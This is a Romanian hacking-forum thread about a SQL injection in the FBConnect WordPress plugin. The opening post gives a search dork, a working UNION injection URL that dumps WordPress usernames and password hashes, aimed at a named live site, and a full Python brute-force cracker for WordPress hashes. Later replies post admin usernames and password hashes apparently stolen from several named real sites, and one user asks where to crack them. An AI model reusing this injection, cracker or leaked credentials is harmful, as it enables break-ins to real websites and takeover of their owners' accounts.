[SQL] Wordpress Sql Injection FBConnect

[x3uz]

Wordpress Sql Injection

App : FBConnect WordPress Plugin

Type : Sql-Injection

Dork : inurl:"fbconnect_action=myhome"

Exploit :

?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)kiddevilz,7,8,9,10,11,12+from+wp_users--

PoC :

www.site.name/path/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)kiddevilz,7,8,9,10,11,12+from+wp_users--

Exemple:

http://www.ariesdubs.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29kiddevilz,7,8,9,10,11,12+from+wp_users--

ok when you have the hash, md5 and enccode64() you can test a bruteforce whit this (python):

# code by : tdxev
# website : www.tdxev.com
# team    : www.insecurity.ro
# version : 2011.01.17
# documentation : /wp-includes/class-phpass.php

import md5
import time



# user settings

wpHashList  = ["$P$BRDa64Z9uIwrPlsRPDbWrVwLqvh7340"]   # list of wordpress hashs #$P$BRDa64Z9uIwrPlsRPDbWrVwLqvh7340 = tdxev
charSet     = 'abcdefghijklmnopqrstuvwxyz0123456789_-' # the character set that the script will use
dumpFile    = '/tmp/wp_crack_result.txt'               # the file where the script will dump the result for each hash
progFile    = '/tmp/wp_crack_progress.txt'             # the file where the script will keep track of progress made
# app settings
itoa64          = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'

# use by crypt_private
def encode64 (textInput,count):
    output = ''
    i = 0
    while i < count  :
        i = i + 1
        value = ord(textInput[i-1])
        output = output + itoa64[value & 63]
        if i < count :
            value = value | ord(textInput[i]) << 8
        output = output + itoa64[(value >> 6) & 63]
        i = i + 1
        if i >= count:
            break
        if i < count:
            value = value | ord(textInput[i]) <<16
        output = output + itoa64[(value >> 12) & 63]
        i = i + 1
        if i >= count:
            break
        output = output + itoa64[(value >> 18) & 63]

    return output

# generate wordpress hash
def crypt_private (plainText, wordpressHash):
    output = '*0'                                                               # old type | not suported yet
    if wordpressHash[0:2] == output:
        output = '*1'
    if wordpressHash[0:3] != '$P$':                                             # old type | not suported yet
        return output
    count_log2   = itoa64.find(wordpressHash[3])                                # get who many times will generate the hash
    if (count_log2 < 7) or (count_log2>30):
        return output
    count = 1 << count_log2                                                     # get who many times will generate the hash
    salt  = wordpressHash[4:12]                                                 # get salt from the wordpress hash
    if len(salt) != 8 :
        return output
    plainTextHash = md5.new(str(salt)+str(plainText)).digest()                  # generate the first hash from salt and word to try
    for i in range (count):                                                     
        plainTextHash = md5.new(str(plainTextHash)+str(plainText)).digest()     # regenerate de hash
    output = wordpressHash[0:12]                                                # get the first part of the wordpress hash (type,count,salt)
    output = output + encode64(plainTextHash,16)                                # create the new hash
    return output


# class that generate the words
class wordGenerator ():

    def __init__(self, word, charSet):
        self.setCurretWord(word) # word to start
        self.setCharSet(charSet) # characther set used to generate the words

    # set current word
    def setCurretWord (self, word):
        self.currentWord = word  

    # set the character set that will be used
    def setCharSet (self, charSet):
        self.charSet = charSet

    # generate the next word set that word as currentWord and retutn the word
    def nextWord (self):
        self.setCurretWord( self._incWord(self.currentWord) )
        return self.currentWord

    # generate the next word
    def _incWord(self, word):
        word = str(word)                        # convert to string

        if word == '':                          # if word is empty 
            return self.charSet[0]              # return first char from the char set
        wordLastChar = word[len(word)-1]        # get the last char
        wordLeftSide = word[0:len(word)-1]      # get word without the last char
        lastCharPos  = self.charSet.find(wordLastChar)  # get position of last char in the char set

        if (lastCharPos+1) < len(self.charSet):         # if position of last char is not at the end of the char set
            wordLastChar = self.charSet[lastCharPos+1]  # get next char from the char set

        else:                                           # it is the last char
            wordLastChar = self.charSet[0]              # reset last chat to have first character from the char set
            wordLeftSide = self._incWord(wordLeftSide)  # send left site to be increased

        return wordLeftSide + wordLastChar      # return the next word


# check if is right type of hashs
for wpHash in  wpHashList:
    if wpHash[0:3] != '$P$':
        print "Wrong password type or password type is DES not impemented yet!"
        exit()

# create a new wordGenerator
newWord     = wordGenerator ('',charSet);           # word generator
wordsFound  = 0
exitLoop    = False

def found(hashItem, word):
    global wordsFound
    global exitLoop

    d = open(dumpFile,'a')                  # open file for append
    d.write(hashItem + ' = '  + word +"\n") # write the result
    d.close()                               # close file

    wordsFound = wordsFound + 1             # increase the number of hashs cracked
    print hashItem + ' = '  + word          # display the word
    if wordsFound == len(wpHashList):       # if the number of hash cracked is equal with number of hashs in the list 
        exitLoop = True                     # rise flag to stop the loop and exit

def setProgress(word) :
    d = open(progFile,'w')                  # open file for append
    d.write("Position :"+ word +"\n")       # write the current word
    d.close()                               # close file


count = 0
while exitLoop == False:
    word = newWord.nextWord()
    count = count + 1
    #print word
    for wpHash in  wpHashList:
        newHash = crypt_private(word,wpHash)
        if  wpHash == newHash :
            found(newHash,word)
    if count == 1000 :
        count = 0
        setProgress(word)

H4ve fun :D:D

Edited May 8, 2011 by x3uz

[Paul4games]

Este public de ceva timp pe exploit-db.....

[x3uz]

whit the python script....? I do not think \M/

[Paul4games]

Nu cu pythone dar puteai folosi sqlmap din cate stiu...

[Mr.KyKy]

x3uz , testat si merge 100% . Bine lucrat poate vei reusi sa gasesti direct pe facebook ceva.

[MagicThunder]

@redcoder inca nu ti-ai dat seama ca acum se posteaza ampulea?Unii posteaza sa se afle in treaba chiar daca sunt total pe dinafara cu totul.Pun pariu ca MR.KYKY habar nu are ce e un dork sau cum se foloseste.Nici daca ii dai scriptul compilat si facut in GUI habar nu are ce sa faca cu el.

Nu mai postati fratilor de dragul de a posta pentru ca e egal cu zero.Macar sa aveti de 10 ori mai putine posturi dar cu ceva util si nu porcarii.Toate topicuril cu salut si bine ai venit au mai multe replyuri decat oricare altele.

Macar uitati-va in p**a mea la ce posteaza Nytro si invatati ceva.La topicurile lui nu am vazut nici un reply sau foarte rar.

[hammerfall]

@tunet magic, sincer, mi se pare ok ca nu-s raspunsuri prea multe la topicurile lui nytro. Ar fi absurd sa vezi toti copiii cum comenteaza "asa e, e bun tutorialul" sau "ai dreptate, chiar merge". Plus de asta, nu cred ca majoritatea (copiilor) inteleg engleza cat sa se descurce cu un tutorial... se descurca la metin, la CS, ls tampenii, dar la un tutorial, daca se poate tradus in romana si cu poze cat mai multe.

Scuze de off-topic, dar nu m-am putut abtine. Apropo, misto SQLi-ul, n-am apucat inca sa-l testez, dar cred ca-mi fac timp maine.

Edited May 19, 2011 by hammerfall
SQLi nu XSS... oboseala... :p

[MagicThunder]

Hammerfall ma refeream la reply uri inteligente si chiar testate nu la gen: "asa e, e bun tutorialul" sau "ai dreptate, chiar merge" .Decat asa mai bine lipsa sincer.

Despre ce xss vorbesti?

[hammerfall]

Am editat postul... De la oboseala... De parca nu ar fi scris mare in titlu...

[Mr.KyKy]

redcoder am facut manual !

Edit :

MagicThunder si daca iti zic ca am habar de drok , de xss , perl , c++ , python , visual basic 2006-2008 etc... . Te rog alta data abtinete si mai ales cu limbajul . Totusi suntem pe un forum unde nu se face offtopic aiurea , ok ?Multumesc

Pentru tine MagicThunder :

http://www.361.ro

user : admin

pass : $P$Bsd11lSuD.d98wyQmwbIaZi5dN4aZf0

http://euwarez.org

user : admin

pass : $P$BaaVNlm6KQV71aTfTuYlwScosReC/F/

http://constantin.ghioc.ro/blog

user : admin

pass : P$B1YRdg96hVhlFxzBDAFNO3Hz3BboMt.

http://www.solutionhacker.com

user : poderul

pass : $P$BNWmW1qF9idDUgkHLJy0wslqD4SLKp.

Edited May 20, 2011 by Mr.KyKy

[M1Nu]

da pot sa le decryptez undeva?(parolele)